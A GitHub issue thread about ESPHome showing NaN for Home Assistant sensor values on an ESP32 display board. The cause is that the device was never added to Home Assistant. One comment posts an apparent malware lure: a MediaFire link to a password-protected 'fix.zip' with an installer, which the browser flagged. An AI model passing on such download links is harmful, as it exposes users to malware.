### ISSUE TITLE
Pull in external values.

### ISSUE THREAD

**Issue by jurgen2005** [BOlaerts/ESP32-2432s028#11]
Somehow I cant get external values to show on the display.
It does update iems like time and signal strenght
It just displays NaN
Other displays like the ssd1306_i2c show the values just fine...

Example:

sensor:
  - platform: homeassistant
    entity_id: sensor.atc_59a3_temperature
    id: temp_indoor

 _print command:_
it.printf(3*hq, vs * 5, id(helvetica_12), id(my_white), TextAlign::CENTER, "%.1f°C", id(temp_indoor).state);

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jurgen2005** [comment]
Browser blocks file on suspected malware..

**Comment by BOlaerts** [comment]
Hi Jurgen,

I don't see any issue with the yaml parts you shared.
Any interesting info in the esphome logging?
I have no problem at all of showing homeassistant values. I only get this kind of error if I put an error in the sensor name.

Also the malware message doesn't look familiar. Where do you get that message?

**Comment by jurgen2005** [comment]
That was in response of the mediafire download..

I did not add the ESP to Homeassistant as a device.. so it could not communicate. Just stupid of me.

**Comment by BOlaerts** [comment]
Glad you found a solution :-)
